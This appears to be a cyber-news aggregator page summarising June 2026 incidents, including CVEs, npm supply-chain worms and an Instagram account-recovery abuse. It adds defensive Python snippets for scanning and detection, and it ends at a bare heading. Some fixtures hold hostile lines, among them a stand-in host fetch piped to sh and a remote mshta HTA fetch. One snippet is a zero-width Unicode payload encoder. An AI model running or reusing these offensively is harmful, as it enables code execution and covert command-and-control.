Find notable cyber news and cases, enriched with sources, timelines, and signals.

Recent notable Happenings and Cases

Last updated: 16:07 02/06/2026 UTC

Latest updates


Meta AI-powered support tools abused in Instagram account recovery flow

Security Tool/Service

Updated: 02.06.2026 18:47 · First: 02.06.2026 18:47 · 📰 1 src / 1 articles · H score: 30

Instagram accounts were hijacked after attackers abused Meta’s AI-powered support tools to pass recovery checks and change the account's recovery email, a direct failure of automated identity verification. The abuse reportedly leveraged selfie verification with AI-generated video and could bypass 2FA, and victims were left in AI-only support loops with no path to a human. Reported targets included a White House team account, Jane Manchun Wong, @hey, and @korn. Meta said the issue had been resolved and that affected accounts were being secured.

Instagram accounts for Obama White House hit by account takeover attack

Incident

Updated: 01.06.2026 20:32 · First: 01.06.2026 20:32 · 📰 2 src / 2 articles · H score: 17

The Instagram accounts of the Obama White House and the Chief Master Sergeant of the U.S. Space Force were briefly defaced after attackers abused Meta’s AI support assistant to reset their passwords, a public-facing account takeover. The reported workflow let the attacker link a new email address to the account and receive a password-reset code at it, which enabled the hijack and the posting of attacker-controlled content. Meta reportedly pushed an emergency patch, and the technique reportedly failed on accounts with MFA enabled.

Bayer reworks awareness training and AI access controls against AI-driven social engineering

Defensive Guidance

Updated: 02.06.2026 16:45 · First: 02.06.2026 16:45 · 📰 1 src / 1 articles · H score: 10

Bayer has shifted to psychology-first security awareness and tiered AI access controls to blunt AI-generated social engineering across employees and suppliers. The program now trains staff to spot pressure, authority abuse, and process-breaking requests instead of relying on old phishing cues like spelling mistakes or suspicious URLs. It also gates access to myGenAssist, extends AI security annexes to suppliers, and pushes the SOC toward human-on-the-loop operations.

Oracle WebLogic Server unauthenticated remote compromise flaw (CVE-2024-21182)

Vulnerability

Updated: 02.06.2026 15:40 · First: 02.06.2026 15:40 · 📰 1 src / 1 articles · H score: 34

CVE-2024-21182 in Oracle WebLogic Server is being actively exploited and lets an unauthenticated attacker with network access to the server compromise it. The flaw affects versions 12.2.1.4.0 and 14.1.1.0.0; Shodan lists 1,592 internet-exposed WebLogic servers reported as vulnerable (exposure, not confirmed exploitability). Oracle released the fix in July 2024, so any still-unpatched server remains exposed: a successful attack can yield unauthorized access to critical data or complete access to all data reachable through WebLogic.
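To check a host's exposure, here is an added example (not from the source report and not Oracle's code) that performs the WebLogic T3 handshake and compares the version the server announces against the two affected releases named above. The T3 HELO banner is a long-used fingerprinting technique; the sample banner below is constructed, and port 7001 and the exact HELO layout are assumptions about a typical deployment.

```python
import socket

# Affected releases named in the entry above (fixed in Oracle's July 2024 patches).
AFFECTED_VERSIONS = {"12.2.1.4.0", "14.1.1.0.0"}

# Client hello of the WebLogic T3 protocol; a T3 listener answers with HELO:<version>...
T3_HELLO = b"t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n"

# Constructed sample reply in the shape a 12.2.1.4.0 server returns.
SAMPLE_BANNER = b"HELO:12.2.1.4.0.false\nAS:2048\nHL:19\nMS:10000000\n\n"


def parse_t3_version(banner: bytes):
    """Extract the version string from a T3 HELO banner, or None if the reply is not T3."""
    first_line = banner.split(b"\n", 1)[0].decode("ascii", errors="replace")
    if not first_line.startswith("HELO:"):
        return None
    fields = first_line[len("HELO:"):].strip().split(".")
    # The banner carries a trailing ".true"/".false" flag after the version digits.
    if fields and fields[-1] in ("true", "false"):
        fields = fields[:-1]
    return ".".join(fields) or None


def assess_banner(banner: bytes):
    """Return (status, version): 'affected', 'other-version', or 'no-t3'."""
    version = parse_t3_version(banner)
    if version is None:
        return ("no-t3", None)
    if version in AFFECTED_VERSIONS:
        return ("affected", version)
    return ("other-version", version)


def probe(host: str, port: int = 7001, timeout: float = 5.0) -> bytes:
    """Send the T3 hello to a live host you are authorized to test and return the raw reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(T3_HELLO)
        return sock.recv(1024)


if __name__ == "__main__":
    import sys
    banner = probe(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_BANNER
    print(assess_banner(banner))
```

A version match means the build is one Oracle listed, not that the July 2024 patch is missing: applying the patch does not change the version in the HELO banner, so confirm patch state from the installed patch inventory (`opatch lsinventory`). Conversely, a host that does not answer T3 at all has the network-level exposure removed, which is the usual stopgap when patching lags: filter T3 and IIOP at the perimeter or with a WebLogic connection filter.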

Google security patch release for CVE-2025-48595

Security Patch Release

Updated: 02.06.2026 14:10 · First: 02.06.2026 14:10 · 📰 1 src / 1 articles · H score: 37

Google's June 2026 Android security patches address 124 vulnerabilities, including one actively exploited zero-day. The release ships as the 2026-06-01 and 2026-06-05 security patch levels and covers System, Framework, and Qualcomm components. The exploited bug, CVE-2025-48595, is a high-severity Android Framework flaw that can enable code execution and privilege escalation on devices running Android 14 or later.

Android Framework code execution and privilege escalation flaw (CVE-2025-48595)

Vulnerability

Updated: 02.06.2026 14:10 · First: 02.06.2026 14:10 · 📰 1 src / 1 articles · H score: 28

Google's June 2026 Android security patches fix CVE-2025-48595, an actively exploited Android Framework flaw that can lead to code execution and privilege escalation on devices running Android 14 or later. Google said the bug may be under limited, targeted exploitation, so exposed devices should be updated promptly. The CVE was first tracked in the March 2025 Android Security Bulletin and is now fixed in the 2026-06-01 and 2026-06-05 patch levels.
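As an added fleet-check helper (not Google's code), the snippet below reads a device's reported security patch level over adb and classifies it against the two June 2026 levels. It assumes, following the Android bulletin convention, that the 2026-06-01 level carries the Framework fix and 2026-06-05 adds the vendor (Qualcomm) fixes; `ro.build.version.security_patch` is the real system property that holds the level.

```python
import re
import subprocess

FRAMEWORK_LEVEL = "2026-06-01"  # assumed to carry the Framework fix for CVE-2025-48595
FULL_LEVEL = "2026-06-05"       # assumed to add the vendor/Qualcomm fixes

_LEVEL_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def level_key(level: str) -> int:
    """Turn a YYYY-MM-DD patch level into a comparable integer; reject anything else."""
    if not _LEVEL_RE.match(level):
        raise ValueError(f"not a security patch level: {level!r}")
    return int(level.replace("-", ""))


def classify(level: str) -> str:
    """'full' at or above 2026-06-05, 'framework-only' at or above 2026-06-01, else 'outdated'."""
    key = level_key(level)
    if key >= level_key(FULL_LEVEL):
        return "full"
    if key >= level_key(FRAMEWORK_LEVEL):
        return "framework-only"
    return "outdated"


def device_patch_level() -> str:
    """Read the live level from a USB-attached device via adb (requires adb on PATH)."""
    result = subprocess.run(
        ["adb", "shell", "getprop", "ro.build.version.security_patch"],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.strip()


if __name__ == "__main__":
    level = device_patch_level()
    print(level, classify(level))
```

A device reporting a level newer than the bulletin is fine, since OEMs ship later levels; one reporting 2026-06-01 has the Framework-side fix but not the vendor fixes released in the same month, which is why the two levels are distinguished rather than treated as one date.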

AI-assisted EDR-evasion malware development lab

Malware Activity

Updated: 02.06.2026 14:00 · First: 02.06.2026 14:00 · 📰 1 src / 1 articles · H score: 12

A threat actor is using AI coding tools to build and refine EDR-evasion malware, accelerating the creation of custom loaders designed to bypass endpoint defenses. The actor's lab tested the tooling against Sophos, CrowdStrike and Microsoft EDR agents, which points to deliberate defender evasion rather than harmless experimentation. The workflow raises the speed and scale at which such malware can be produced and may support stealthy post-exploitation operations.

UK businesses shift toward AI-threat preparedness as recovery gaps persist

Trend

Updated: 02.06.2026 13:00 · First: 02.06.2026 13:00 · 📰 1 src / 1 articles · H score: 19

UK businesses are shifting cyber spending toward AI and advanced threat preparedness, with 43% naming AI-powered attacks as their biggest near-term risk. The backdrop is a high incident burden: 77% of UK businesses reported a cyber incident in the past year. Recovery remains slow even where detection is fast: 94% of incidents are identified within 24 hours, but more than a quarter take over 10 days to resolve. The survey also points to a skills gap and uneven resilience maturity, leaving organizations exposed to prolonged disruption.

Red Hat npm namespace hijacked in supply-chain attack

Incident

Updated: 01.06.2026 20:40 · First: 01.06.2026 20:40 · 📰 2 src / 2 articles · H score: 13

Red Hat's official npm namespace was hijacked in a supply-chain attack that republished 32 packages in the @redhat-cloud-services scope on June 1; the malicious versions were uploaded within 72 seconds and carried an install-time preinstall script that steals cloud, CI/CD, and npm credentials. Researchers identified the payload as a variant of Mini Shai-Hulud/Miasma, and the affected packages account for about 9.8 million downloads.

SideCopy Operation XENOFISCAL spear-phishing campaign targeting Afghan finance entities

Campaign

Updated: 02.06.2026 12:05 · First: 02.06.2026 12:05 · 📰 1 src / 1 articles · H score: 25

The SideCopy-linked Operation XENOFISCAL spear-phishing campaign targets Afghanistan's Ministry of Finance and related provincial finance offices with Xeno RAT, putting government hosts at risk of compromise. Delivery uses a ZIP archive containing a malicious LNK file and a Pashto-language lure; the shortcut launches mshta.exe, which fetches an HTA and runs JavaScript in memory. Targeting extends to provincial revenue and finance directorates, Pashto-speaking government officials, and provincial-level employees, a focused government-targeting effort.
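The LNK, mshta.exe, remote-HTA chain described above is visible in process-creation telemetry. Below is an added detection example (not from the source research) that scores Sysmon-style process events; the events are constructed, the field names are assumptions about an already-normalized event shape, and `example.invalid` stands in for the real fetch URL.

```python
import re

URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample events in a normalized Sysmon Event ID 1 shape (field names assumed).
SAMPLE_EVENTS = [
    {   # shortcut double-clicked in Explorer, mshta pulls a remote HTA
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": r'"C:\Windows\System32\mshta.exe" https://example.invalid/notice.hta',
        "parent_image": r"C:\Windows\explorer.exe",
    },
    {   # benign: a vendor installer running a local HTA
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"',
        "parent_image": r"C:\Program Files\Vendor\installer.exe",
    },
    {   # unrelated
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": "cmd.exe /c dir",
        "parent_image": r"C:\Windows\explorer.exe",
    },
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> list:
    """Return the reasons an event looks like the XENOFISCAL-style mshta stage (empty if none)."""
    reasons = []
    if _basename(event.get("image", "")) != "mshta.exe":
        return reasons
    if URL_RE.search(event.get("command_line", "")):
        reasons.append("mshta given a remote URL (HTA fetch)")
    if _basename(event.get("parent_image", "")) == "explorer.exe":
        reasons.append("mshta spawned by explorer.exe (shortcut launch)")
    return reasons


def detect(events) -> list:
    """Apply score_event to a stream of events and keep the suspicious ones."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            hits.append((event.get("command_line", ""), reasons))
    return hits


if __name__ == "__main__":
    for command_line, reasons in detect(SAMPLE_EVENTS):
        print(command_line, "->", "; ".join(reasons))
```

The rule keys on the URL scheme rather than an `.hta` extension because the server can hand mshta an HTA under any name. In environments where mshta has legitimate use, require the remote-URL reason and treat the explorer-parent reason as corroboration only; where it has none, blocking mshta.exe outright with AppLocker or WDAC removes the stage entirely.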

Dashlane personal-plan users' encrypted vault exposure

Data Leak

Updated: 02.06.2026 06:55 · First: 02.06.2026 06:55 · 📰 1 src / 1 articles · H score: 26

On May 31, 2026, Dashlane disclosed that an external brute-force attack on user accounts led to encrypted vaults being downloaded for fewer than 20 personal-plan users, a limited but concrete exposure of sensitive stored data. The attackers attempted to bypass 2FA and add new devices to existing accounts. Dashlane said affected users were notified and that the downloaded vaults cannot be read without each user's Master Password, so the practical exposure turns on the strength of that password.

Infosecurity Europe launches Cyber Startup Programme

Commercial Activity

Updated: 06.02.2026 10:30 · First: 06.02.2026 10:30 · 📰 1 src / 1 articles · H score: 0

Infosecurity Europe unveiled the Cyber Startup Programme and Cyber Startups Zone to give early-stage cybersecurity companies a larger platform, helping them connect with investors and buyers ahead of Infosecurity Europe 2026. The initiative includes dedicated show-floor access, tailored ticket options, and a collaboration with UK Cyber Flywheel. It also adds a live startup award competition designed to spotlight emerging cyber products and growth potential.

DriveSurge large-scale website-hijack malware distribution campaign

Campaign

Updated: 02.06.2026 01:14 · First: 02.06.2026 01:14 · 📰 1 src / 1 articles · H score: 41

The DriveSurge campaign redirects visitors from thousands of compromised websites to malware-delivery infrastructure, opening a broad infection path through ClickFix and FakeUpdates lures. The operation uses the zTDS traffic distribution system to profile each visitor and route them to the lure most likely to succeed. DriveSurge is described as an initial access broker operating on a pay-per-install model, so its redirects feed follow-on intrusions. The activity now extends beyond Windows to macOS clipboard-hijacking ClickFix lures, widening the set of endpoints at risk.

DriveSurge as an initial access broker on a pay-per-install model

Threat Actor Meta

Updated: 02.06.2026 01:14 · First: 02.06.2026 01:14 · 📰 1 src / 1 articles · H score: 41

DriveSurge has shifted into an initial access broker role built around a pay-per-install (PPI) model, selling the infections it produces and so raising downstream intrusion risk. Its use of zTDS to profile visitors and choose between FakeUpdates and ClickFix lures makes the pipeline efficient at turning redirected traffic into installs. The reach across thousands of compromised websites gives the model broad scale and repeatability.

Miasma GitHub and npm supply-chain campaign

Campaign

Updated: 02.06.2026 00:38 · First: 02.06.2026 00:38 · 📰 1 src / 1 articles · H score: 48

A Miasma supply-chain campaign has spread through GitHub and npm, compromising 309 GitHub repositories and widening the risk of credential theft across developer projects. The operation used a compromised GitHub account, malicious commits, and npm trusted publishing to push backdoored packages. Attribution remains open, but the activity shows continuity over the past couple of months and a broad developer-ecosystem footprint.

Spanish National Police arrest in INCIBE leak case

Law Enforcement

Updated: 02.06.2026 00:28 · First: 02.06.2026 00:28 · 📰 1 src / 1 articles · H score: 16

The Spanish National Police arrested a suspect in a doxxing/data-leak case that exposed personal data tied to INCIBE and other key state organizations. The probe, overseen by Madrid Investigative Court No. 22, led to a home search and seizure of computers and other electronic devices. The arrest expands the criminal investigation into a leak that authorities say created national security risks.

Mass leak of personal data from Spanish state entities

Data Leak

Updated: 02.06.2026 00:28 · First: 02.06.2026 00:28 · 📰 1 src / 1 articles · H score: 24

Spanish state entities are facing a mass leak of personal data that exposed employees and members of critical institutions and created national security risk. The records were tied to INCIBE, the State Attorney General's Office, the National Police, the Civil Guard, and the National Security Council. Published material included DNI numbers, mobile numbers, and professional email addresses, and authorities traced the activity to an operation circulating since February 2026.

Dashlane password manager account lockouts from brute-force attacks

Service Disruption

Updated: 01.06.2026 21:17 · First: 01.06.2026 21:17 · 📰 2 src / 2 articles · H score: 12

Dashlane experienced a temporary account-access disruption after brute-force login attempts triggered security lockouts for some users. The affected accounts were later unsuspended, and Dashlane said there was no evidence of compromise in its systems. Some users still reported login problems while the service monitored the issue.

TeamPCP Mini Shai-Hulud npm supply-chain campaign

Campaign

Updated: 12.05.2026 14:07 · First: 12.05.2026 14:07 · 📰 3 src / 5 articles · H score: 48

The TeamPCP-linked Mini Shai-Hulud campaign is a malicious npm supply-chain operation that steals developer credentials and abuses trusted publishing paths to spread trojanized packages. A new Miasma wave compromised @redhat-cloud-services npm packages to steal GitHub Actions secrets, npm tokens, cloud credentials, Kubernetes and Vault material, SSH keys, and other sensitive files from developer machines, using preinstall hooks, encrypted exfiltration to api.anthropic[.]com:443/v1/api with a GitHub fallback, and downstream propagation. The activity remains active and matters because stolen tokens and pipeline access enable self-propagation and broader compromise across developer ecosystems.

Mini Shai-Hulud npm supply-chain malware wave

Malware Activity

Updated: 12.05.2026 14:07 · First: 12.05.2026 14:07 · 📰 3 src / 8 articles · H score: 34

The Mini Shai-Hulud npm supply-chain malware activity now includes a Miasma variant that compromised @redhat-cloud-services packages to steal credentials and secrets from developer machines and deliver a self-propagating worm. Researchers said the campaign combines install-time execution, credential harvesting, CI/CD targeting, encrypted exfiltration, and downstream propagation, with stolen data sent to api.anthropic[.]com:443/v1/api and GitHub used as a fallback. Evidence also points to a compromised Red Hat employee's GitHub account as the injection path, and the first related commit containing "Miasma: The Spreading Blight" appeared on May 29, 2026.
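The Red Hat, Miasma and Mini Shai-Hulud entries above all turn on the same mechanism: an install-time lifecycle script running on the developer or CI machine. Here is an added example (not from the researchers' reports) that inventories those hooks across a dependency tree and flags packages under a scope you are watching; the package manifests below are constructed, and the scope list is an assumption that you would replace with the scopes named in the advisory you are acting on.

```python
import json
import os
from typing import Iterable

# Hooks npm runs automatically when a dependency is installed from the registry.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Constructed sample manifests: (path, parsed package.json)
SAMPLE_PACKAGES = [
    ("node_modules/@redhat-cloud-services/example-lib/package.json", {
        "name": "@redhat-cloud-services/example-lib",
        "version": "9.9.9",
        "scripts": {"preinstall": "node setup.js", "test": "jest"},
    }),
    ("node_modules/left-pad-ish/package.json", {
        "name": "left-pad-ish",
        "version": "1.0.0",
        "scripts": {"test": "node test.js"},
    }),
    ("node_modules/native-thing/package.json", {
        "name": "native-thing",
        "version": "2.1.0",
        "scripts": {"install": "node-gyp rebuild"},
    }),
]


def scan_packages(packages: Iterable, watch_scopes=("@redhat-cloud-services",)) -> list:
    """Report every manifest with an install-time hook, marking those under a watched scope."""
    findings = []
    for path, pkg in packages:
        scripts = pkg.get("scripts") or {}
        hooks = {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}
        if not hooks:
            continue
        name = pkg.get("name", "?")
        findings.append({
            "name": name,
            "version": pkg.get("version", "?"),
            "path": path,
            "hooks": hooks,
            "watched_scope": any(name.startswith(scope + "/") for scope in watch_scopes),
        })
    return findings


def load_manifests(root: str) -> Iterable:
    """Yield (path, manifest) for every package.json under root, skipping unreadable ones."""
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue
        yield path, manifest


if __name__ == "__main__":
    import sys
    source = load_manifests(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_PACKAGES
    for finding in scan_packages(source):
        flag = "WATCHED " if finding["watched_scope"] else ""
        print(f"{flag}{finding['name']}@{finding['version']}: {finding['hooks']}")
```

Native modules legitimately use `install` hooks, so the output is a review list rather than a verdict. The blunt control is `npm install --ignore-scripts` (or `npm config set ignore-scripts true`), which stops every such hook from running and makes the packages that genuinely need one an explicit, reviewed exception; in CI, short-lived and narrowly scoped tokens limit what a harvested credential is worth.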

WordPress malware campaign using Steam profile C2 concealment

Campaign

Updated: 01.06.2026 20:04 · First: 01.06.2026 20:04 · 📰 1 src / 1 articles · H score: 37

A WordPress malware campaign has infected about 1,980 websites since July 2025 and hides its command-and-control (C2) data in Steam Community profile comments to reduce detection. The operation encodes payloads in invisible Unicode characters, then directs sites to hello-mywordl[.]info to fetch the JavaScript it injects. It can also install a backdoor that accepts base64-encoded PHP code via POST when a specific authentication cookie is present.

WordPress malware hides C2 data in Steam Community comments

Malware Activity

Updated: 01.06.2026 20:04 · First: 01.06.2026 20:04 · 📰 1 src / 1 articles · H score: 16

A WordPress malware operation has been uncovered on approximately 1,980 websites, raising the risk of hidden command-and-control (C2) traffic and persistent page injection. The malware conceals payload data in Steam Community profile comments using invisible Unicode characters. It also pulls script content from hello-mywordl[.]info and can plant a backdoor on infected sites.
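The invisible-Unicode trick is worth seeing concretely. The block below is an added example (not the campaign's code, whose exact alphabet the report above does not spell out): it encodes bytes as a run of zero-width characters appended to an ordinary comment and, more usefully for defenders, finds and decodes such runs in arbitrary text. The bit alphabet (U+200B for 0, U+200C for 1), the payload and the cover comment are assumptions constructed for the example.

```python
# Bit alphabet (assumed; campaigns vary): ZERO WIDTH SPACE = 0, ZERO WIDTH NON-JOINER = 1
ZERO = "\u200b"
ONE = "\u200c"
# Other code points that render as nothing and commonly pad such payloads
INVISIBLE = {ZERO, ONE, "\u200d", "\u2060", "\ufeff"}

SAMPLE_PAYLOAD = b"https://example.invalid/loader.js"   # constructed stand-in for a C2 pointer
SAMPLE_COVER = "gg, nice profile :)"                    # constructed cover comment


def hide(payload: bytes, cover: str) -> str:
    """Append payload to cover as one zero-width character per bit."""
    bits = "".join(f"{byte:08b}" for byte in payload)
    return cover + "".join(ONE if bit == "1" else ZERO for bit in bits)


def invisible_runs(text: str, min_len: int = 8) -> list:
    """Return (offset, run) for every run of invisible characters at least min_len long."""
    runs = []
    start = None
    for i, ch in enumerate(text + "\x00"):   # sentinel closes a trailing run
        if ch in INVISIBLE:
            if start is None:
                start = i
        elif start is not None:
            if i - start >= min_len:
                runs.append((start, text[start:i]))
            start = None
    return runs


def reveal(run: str) -> bytes:
    """Decode a run produced by hide(); invisible characters outside the alphabet are skipped."""
    bits = "".join("1" if ch == ONE else "0" for ch in run if ch in (ZERO, ONE))
    bits = bits[: len(bits) - len(bits) % 8]          # drop a trailing partial byte
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def extract_all(text: str) -> list:
    """Decode every invisible run in text; the visible text is left alone."""
    return [reveal(run) for _offset, run in invisible_runs(text)]


if __name__ == "__main__":
    comment = hide(SAMPLE_PAYLOAD, SAMPLE_COVER)
    print(repr(comment[: len(SAMPLE_COVER)]), "+", len(comment) - len(SAMPLE_COVER), "invisible chars")
    print(extract_all(comment))
```

`invisible_runs` is the detection half: a comment that looks like a few words but contains hundreds of zero-width code points is itself the signal, whatever encoding is in use. On a suspected site, run it over the text the site fetches from the profile page before anything is evaluated, and in the PHP, look for code that maps U+200B/U+200C to bits alongside the base64-decode-on-POST backdoor pattern described above.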

Microsoft Teams and Office for the web file-opening outage

Service Disruption

Updated: 01.06.2026 17:36 · First: 01.06.2026 17:36 · 📰 1 src / 1 articles · H score: 25

Microsoft is investigating an ongoing service disruption that prevents Teams and Office for the web users from opening files, cutting off access to shared documents across multiple Office apps. The outage affects at least Excel for the web, where users see an error that Office Online services aren't available right now. Microsoft says it is working to restore service while it isolates the root cause.

Flowise Custom MCP RCE (CVE-2026-40933)

Vulnerability

Updated: 01.06.2026 17:00 · First: 01.06.2026 17:00 · 📰 1 src / 1 articles · H score: 31

A critical RCE flaw in Flowise, tracked as CVE-2026-40933, lets an attacker take over a self-hosted deployment when a logged-in user imports a malicious workflow file. The weakness is in the Custom MCP tool's stdio transport, where user-supplied commands from the imported workflow are executed on the server. Obsidian Security published working PoC code and said the disclosed fix can be bypassed. The managed Flowise Cloud service is not affected; operators running the open-source platform should disable the stdio transport and use SSE.
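Because the trigger is importing a workflow file, the cheapest control is to inspect exports before import. Here is an added pre-import check (not Obsidian's PoC and not Flowise's code): it walks a workflow JSON export, including parameters stored as JSON text inside strings, and reports any MCP server definition carrying a `command` key, which is the stdio-transport shape from the MCP client configuration convention. The node layout and field names in the sample workflow are assumptions about Flowise's export format, and the command is constructed.

```python
import json

# Constructed workflow export; node structure and field names are assumptions.
SAMPLE_WORKFLOW = {
    "nodes": [
        {
            "id": "customMCP_0",
            "data": {
                "name": "customMCP",
                "inputs": {
                    # stdio transport: spawns a process on the Flowise host
                    "mcpServerConfig": json.dumps({
                        "command": "bash",
                        "args": ["-c", "curl -s https://example.invalid/x | sh"],
                    })
                },
            },
        },
        {
            "id": "customMCP_1",
            "data": {
                "name": "customMCP",
                "inputs": {
                    # SSE transport: a URL, no local process
                    "mcpServerConfig": json.dumps({"url": "https://mcp.example.invalid/sse"})
                },
            },
        },
        {"id": "chatOpenAI_0", "data": {"name": "chatOpenAI", "inputs": {"temperature": 0.2}}},
    ]
}


def _walk(node):
    """Yield every dict reachable in node, descending into JSON encoded as string values."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from _walk(value)
    elif isinstance(node, list):
        for value in node:
            yield from _walk(value)
    elif isinstance(node, str):
        stripped = node.strip()
        if stripped[:1] in ("{", "["):
            try:
                yield from _walk(json.loads(stripped))
            except ValueError:          # not JSON after all; nothing to descend into
                pass


def find_stdio_servers(workflow) -> list:
    """Return each MCP server definition that would spawn a local process on import."""
    found = []
    for item in _walk(workflow):
        if isinstance(item, dict) and isinstance(item.get("command"), str):
            args = item.get("args")
            found.append({
                "command": item["command"],
                "args": [str(a) for a in args] if isinstance(args, list) else [],
            })
    return found


def review_export(text: str) -> list:
    """Parse an exported workflow (JSON text) and list its stdio MCP servers."""
    return find_stdio_servers(json.loads(text))


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            raw = fh.read()
    else:
        raw = json.dumps(SAMPLE_WORKFLOW)
    for server in review_export(raw):
        print("stdio MCP server would run:", server["command"], server["args"])
```

Treat any hit as a reason not to import the file. The scan is a gate on files, not a fix: a server configuration edited through the UI after import is not covered, which is why the server-side recommendation above (stdio off, SSE only) is the control that actually closes the hole.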

CCB urgent patch warning for CVE-2026-41089 on Windows servers

Public Sector Action

Updated: 01.06.2026 15:30 · First: 01.06.2026 15:30 · 📰 1 src / 1 articles · H score: 48

Belgium's CCB warned that CVE-2026-41089 is being actively exploited in the wild and urged admins to patch vulnerable Windows servers immediately, because the flaw can enable remote code execution on domain controllers. The bug is in Windows Netlogon, the core authentication service of Windows domain networks, and affects all currently supported Windows Server versions, including Windows Server 2025. Microsoft fixed it in the May 2026 Patch Tuesday release.

Operation Dragon Weave cyber-espionage campaign

Campaign

Updated: 01.06.2026 14:54 · First: 01.06.2026 14:54 · 📰 1 src / 1 articles · H score: 37

The Operation Dragon Weave campaign is actively targeting officials and citizens in the Czech Republic and Taiwan with spear-phishing ZIP attachments. The infection chain uses a Rust loader and DLL side-loading to deploy AdaptixC2 for remote control and data exfiltration. Targeting also covers the government, research, academic, technology, and financial services sectors. The final-stage payload, AZUREVEIL, uses Microsoft Azure Blob Storage as a dead-drop command-and-control channel, so the operators expose little infrastructure of their own.

Microsoft My Sign-Ins MFA outage

Service Disruption

Updated: 01.06.2026 14:40 · First: 01.06.2026 14:40 · 📰 1 src / 3 articles · H score: 25

Microsoft is dealing with an ongoing outage that is blocking some users from setting up multi-factor authentication (MFA) and accessing My Sign-Ins. Affected users are seeing 504 Gateway Timeout errors on mysignins.microsoft.com, which disrupts sign-in management and access setup. Microsoft said it has failed over to alternate infrastructure and is monitoring service health while it evaluates additional mitigation.

Linux kernel CIFS subsystem CIFSwitch local privilege-escalation flaw

Vulnerability

Updated: 30.05.2026 17:16 · First: 30.05.2026 17:16 · 📰 2 src / 2 articles · H score: 31

The Linux kernel CIFS subsystem has a disclosed local privilege-escalation flaw, dubbed CIFSwitch, that can let an unprivileged local attacker reach root by abusing request_key and the cifs.upcall helper in the CIFS authentication flow. The issue affects multiple Linux distributions with vulnerable kernel CIFS and cifs-utils combinations, including systems where cifs-utils ships by default. Major distributions have rolled out fixes, and a proof-of-concept (PoC) is available to help validate patches, mitigations, detections, and exposure.

Major Linux distribution fixes for CIFSwitch

Security Patch Release

Updated: 01.06.2026 14:19 · First: 01.06.2026 14:19 · 📰 1 src / 1 articles · H score: 27

Major Linux distributions rolled out fixes for the CIFSwitch security defect, closing a root-privilege escalation path in the Linux kernel CIFS subsystem. The patch rollout covered multiple distributions and landed earlier this month. The defect involved the kernel’s CIFS handling and the cifs-utils helper (cifs.upcall) used for authentication. Systems shipping the helper by default, or with it installed manually, faced the most direct exposure before the fixes arrived.
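The two CIFSwitch entries above place the attack surface in the kernel's CIFS authentication upcall: request_key(2) asks the userspace request-key(8) service for a key, and that service is wired by configuration to run cifs.upcall. This added check (not the PoC and not any distribution's advisory tooling) reports whether a host carries that wiring, which decides whether the patch state matters at all. The helper paths follow the usual cifs-utils layout but vary by distribution, and the sample configuration text is constructed in the format cifs-utils installs under /etc/request-key.d.

```python
import os

# Where cifs-utils installs the helper (varies by distribution; assumption)
HELPER_PATHS = ("/usr/sbin/cifs.upcall", "/sbin/cifs.upcall", "/usr/bin/cifs.upcall")
# Files request-key(8) reads to decide which program handles a key type
REQUEST_KEY_CONF = "/etc/request-key.conf"
REQUEST_KEY_DIR = "/etc/request-key.d"

# Constructed sample in the format of cifs-utils' /etc/request-key.d/cifs.spnego.conf
SAMPLE_CONF = """\
# cifs.spnego keys are handled by cifs.upcall
create  cifs.spnego    * * /usr/sbin/cifs.upcall %k
create  dns_resolver   * * /usr/sbin/cifs.upcall %k
"""


def cifs_upcall_rules(conf_text: str) -> list:
    """Return the active (uncommented) request-key rules that hand key creation to cifs.upcall."""
    rules = []
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # request-key.conf rule: <op> <type> <description> <callout-info> <program> [args...]
        if len(fields) >= 5 and fields[0] == "create" and "cifs.upcall" in fields[4]:
            rules.append(line)
    return rules


def assess(helper_present: bool, rules: list, cifs_loaded: bool) -> str:
    """Collapse the three observations into one exposure label."""
    if helper_present and rules:
        return "exposed" if cifs_loaded else "exposed-if-cifs-loads"
    if helper_present or rules:
        return "partial-wiring"
    return "not-wired"


def assess_host(root: str = "/") -> dict:
    """Inspect the live system (or a filesystem image mounted at root) and return the findings."""
    def under(path):
        return os.path.join(root, path.lstrip("/"))

    helper = next((p for p in HELPER_PATHS if os.path.exists(under(p))), None)
    conf_files = [under(REQUEST_KEY_CONF)]
    conf_dir = under(REQUEST_KEY_DIR)
    if os.path.isdir(conf_dir):
        conf_files += [os.path.join(conf_dir, f) for f in sorted(os.listdir(conf_dir)) if f.endswith(".conf")]
    rules = []
    for path in conf_files:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                rules += cifs_upcall_rules(fh.read())
        except OSError:
            continue
    cifs_loaded = os.path.isdir(under("/sys/module/cifs"))   # module currently loaded
    return {"helper": helper, "rules": rules, "cifs_loaded": cifs_loaded,
            "status": assess(helper is not None, rules, cifs_loaded)}


if __name__ == "__main__":
    print(assess_host())
```

A status of `exposed` means the pre-fix attack path is wired on this host, not that the host is unpatched; compare the kernel and cifs-utils package versions against your distribution's advisory, or run the published PoC on a test system, to settle that. Where Kerberos-authenticated SMB mounts are not needed, removing cifs-utils or the cifs.spnego rule removes the upcall path itself.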

GammaWorm NTFS Alternate Data Streams propagation and backdoor activity

Malware Activity

